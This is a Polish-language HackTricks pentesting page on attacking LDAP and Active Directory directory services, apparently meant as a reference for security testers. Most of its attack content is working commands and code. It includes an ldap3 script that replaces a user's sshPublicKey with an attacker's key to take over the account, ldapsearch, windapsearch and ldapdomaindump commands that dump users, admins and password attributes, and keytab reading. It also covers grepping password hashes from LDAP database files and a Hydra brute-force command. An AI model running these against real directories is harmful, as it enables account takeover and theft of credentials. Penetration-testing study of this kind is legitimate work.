# 389, 636, 3268, 3269 - Testowanie penetracyjne LDAP

<details>

<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Inne sposoby wsparcia HackTricks:

* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

Użycie protokołu **LDAP** (Lightweight Directory Access Protocol) polega głównie na lokalizowaniu różnych jednostek, takich jak organizacje, osoby i zasoby, takie jak pliki i urządzenia, w sieciach publicznych i prywatnych. Oferuje on bardziej uproszczone podejście w porównaniu do swojego poprzednika, DAP, dzięki mniejszemu rozmiarowi kodu.

Katalogi LDAP są strukturalnie zorganizowane, aby umożliwić ich dystrybucję na kilku serwerach, z których każdy przechowuje **zreplikowaną** i **zsynchronizowaną** wersję katalogu, zwanej agentem systemu katalogowego (DSA). Odpowiedzialność za obsługę żądań leży całkowicie po stronie serwera LDAP, który może komunikować się z innymi DSA w razie potrzeby, aby dostarczyć jednolitą odpowiedź do żądającego.

Organizacja katalogu LDAP przypomina **hierarchię drzewa, zaczynając od katalogu głównego na górze**. Następnie rozgałęzia się na kraje, które dalej dzielą się na organizacje, a następnie na jednostki organizacyjne reprezentujące różne działy lub departamenty, docierając w końcu do poziomu indywidualnych jednostek, obejmujących zarówno ludzi, jak i współdzielone zasoby, takie jak pliki i drukarki.

**Domyślny port:** 389 i 636 (ldaps). Katalog globalny (LDAP w ActiveDirectory) jest domyślnie dostępny na portach 3268 i 3269 dla LDAPS.
```
PORT    STATE SERVICE REASON
389/tcp open  ldap    syn-ack
636/tcp open  tcpwrapped
```
### Format wymiany danych LDAP

LDIF (LDAP Data Interchange Format) definiuje zawartość katalogu jako zestaw rekordów. Może również reprezentować żądania aktualizacji (Dodaj, Zmień, Usuń, Zmień nazwę).
```bash
dn: dc=local
dc: local
objectClass: dcObject

dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization

dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev

dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales

dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495
```
* Linie 1-3 definiują domenę najwyższego poziomu local
* Linie 5-8 definiują domenę pierwszego poziomu moneycorp (moneycorp.local)
* Linie 10-16 definiują 2 jednostki organizacyjne: dev i sales
* Linie 18-26 tworzą obiekt domeny i przypisują atrybuty z wartościami

## Zapisz dane

Należy zauważyć, że jeśli można modyfikować wartości, można wykonać naprawdę interesujące czynności. Na przykład, wyobraź sobie, że **możesz zmienić informacje o "sshPublicKey"** dla swojego użytkownika lub dowolnego użytkownika. Bardzo prawdopodobne jest, że jeśli ten atrybut istnieje, to **ssh odczytuje klucze publiczne z LDAP**. Jeśli możesz zmodyfikować klucz publiczny użytkownika, **będziesz mógł zalogować się jako ten użytkownik, nawet jeśli uwierzytelnianie hasłem nie jest włączone w ssh**.
```bash
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
```
## Przechwytywanie poufnych danych w postaci tekstu

Jeśli LDAP jest używany bez SSL, możesz **przechwycić poufne dane w postaci tekstu** w sieci.

Możesz również przeprowadzić atak **MITM** w sieci **między serwerem LDAP a klientem**. Tutaj możesz przeprowadzić atak **Downgrade**, aby klient używał **danych uwierzytelniających w postaci tekstu** do logowania.

Jeśli używane jest **SSL**, możesz spróbować przeprowadzić atak **MITM**, jak wyżej wspomniano, oferując **fałszywy certyfikat**. Jeśli **użytkownik go zaakceptuje**, będziesz mógł zredukować metodę uwierzytelniania i ponownie zobaczyć dane uwierzytelniające.

## Anonimowy dostęp

### Ominięcie sprawdzania TLS SNI

Według [**tego opisu**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/), po prostu uzyskując dostęp do serwera LDAP za pomocą dowolnej nazwy domeny (np. company.com), można było skontaktować się z usługą LDAP i wydobyć informacje jako anonimowy użytkownik:
```bash
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
```
### Anonimowe powiązania LDAP

[Anonimowe powiązania LDAP](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) pozwalają **nieuwierzytelnionym atakującym** na pobieranie informacji z domeny, takich jak pełna lista użytkowników, grup, komputerów, atrybuty kont użytkowników i polityka hasła domeny. Jest to **konfiguracja dziedziczna**, a od Windows Server 2003 tylko uwierzytelnieni użytkownicy mają uprawnienia do inicjowania żądań LDAP.\
Jednak administratorzy mogli potrzebować **skonfigurowania określonej aplikacji, aby umożliwić anonimowe powiązania** i udostępnić więcej niż zamierzony dostęp, co daje nieuwierzytelnionym użytkownikom dostęp do wszystkich obiektów w AD.

## Prawidłowe dane uwierzytelniające

Jeśli masz prawidłowe dane uwierzytelniające do logowania się do serwera LDAP, możesz wydobyć wszystkie informacje o Administratorze domeny za pomocą:

[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
```bash
pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
```
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#ldap)

## Wyliczanie

### Automatyczne

Korzystając z tego, będziesz w stanie zobaczyć **publiczne informacje** (takie jak nazwa domeny)**:**
```bash
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
```
### Python

<details>

<summary>Zobacz wyliczanie LDAP za pomocą pythona</summary>

Możesz spróbować **wyliczyć LDAP z lub bez poświadczeń za pomocą pythona**: `pip3 install ldap3`

Najpierw spróbuj **połączyć się bez** poświadczeń:
```bash
>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
True
>>> server.info
```
Jeśli odpowiedź jest `True`, jak w poprzednim przykładzie, możesz uzyskać pewne **ciekawe dane** z serwera LDAP (takie jak **kontekst nazw** lub **nazwa domeny**) za pomocą:
```bash
>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN
```
Gdy już masz kontekst nazw, możesz wykonać kilka bardziej ekscytujących zapytań. To proste zapytanie powinno pokazać wszystkie obiekty w katalogu:
```bash
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries
```
Lub **wydumpuj** całe ldap:
```bash
>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries
```
</details>

### windapsearch

[**Windapsearch**](https://github.com/ropnop/windapsearch) to skrypt napisany w języku Python, który jest przydatny do **wyliczania użytkowników, grup i komputerów z domeny Windows** poprzez wykorzystanie zapytań LDAP.
```bash
# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users
```
### ldapsearch

Sprawdź puste poświadczenia lub czy twoje poświadczenia są poprawne:
```bash
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
```

```bash
# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
```
Jeśli znajdziesz coś mówiącego, że "_bind musi zostać ukończony_", oznacza to, że dane uwierzytelniające są nieprawidłowe.

Możesz wydobyć **wszystko z domeny** za pomocą:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given
```
Wyciągnij **użytkowników**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
```
Wydobądź **komputery**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Wydobądź **moje informacje**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Wyciągnij **Domain Admins**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Wydobądź **Użytkowników domeny**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Wyciągnij **Enterprise Admins**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Wyciągnij **Administratorów**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Wyciągnij **Grupę zdalnego pulpitu**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
Aby sprawdzić, czy masz dostęp do jakiegokolwiek hasła, możesz użyć polecenia grep po wykonaniu jednego z zapytań:
```bash
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
```
#### pbis

Możesz pobrać **pbis** stąd: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) i zazwyczaj jest instalowany w `/opt/pbis`.\
**Pbis** pozwala na łatwe uzyskanie podstawowych informacji:
```bash
#Read keytab file
./klist -k /etc/krb5.keytab

#Get known domains info
./get-status
./lsa get-status

#Get basic metrics
./get-metrics
./lsa get-metrics

#Get users
./enum-users
./lsa enum-users

#Get groups
./enum-groups
./lsa enum-groups

#Get all kind of objects
./enum-objects
./lsa enum-objects

#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done

#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done

#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done
```
## Interfejs graficzny

### Apache Directory

[**Pobierz Apache Directory stąd**](https://directory.apache.org/studio/download/download-linux.html). Możesz znaleźć [przykład użycia tego narzędzia tutaj](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s).

### jxplorer

Możesz pobrać interfejs graficzny z serwerem LDAP stąd: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)

Domyślnie jest zainstalowany w: _/opt/jxplorer_

![](<../.gitbook/assets/image (22) (1).png>)

### Godap

Możesz uzyskać do niego dostęp pod adresem [https://github.com/Macmod/godap](https://github.com/Macmod/godap)

## Uwierzytelnianie za pomocą kerberosa

Za pomocą polecenia `ldapsearch` możesz **uwierzytelnić** się za pomocą **kerberosa zamiast** NTLM, używając parametru `-Y GSSAPI`

## POST

Jeśli masz dostęp do plików, w których znajdują się bazy danych (mogą być w _/var/lib/ldap_), możesz wydobyć hashe za pomocą:
```bash
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
```
Możesz podać hasz hasła do Johna (od '{SSHA}' do 'structural', bez dodawania 'structural').

### Pliki konfiguracyjne

* Ogólne
* containers.ldif
* ldap.cfg
* ldap.conf
* ldap.xml
* ldap-config.xml
* ldap-realm.xml
* slapd.conf
* IBM SecureWay V3 server
* V3.sas.oc
* Microsoft Active Directory server
* msadClassesAttrs.ldif
* Netscape Directory Server 4
* nsslapd.sas\_at.conf
* nsslapd.sas\_oc.conf
* OpenLDAP directory server
* slapd.sas\_at.conf
* slapd.sas\_oc.conf
* Sun ONE Directory Server 5.1
* 75sas.ldif

## Automatyczne polecenia HackTricks
```
Protocol_Name: LDAP    #Protocol Abbreviation if there is one.
Port_Number:  389,636     #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.

https://book.hacktricks.xyz/pentesting/pentesting-ldap

Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}

Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x

Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts

Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"

Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
```
<details>

<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Inne sposoby wsparcia HackTricks:

* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.

</details>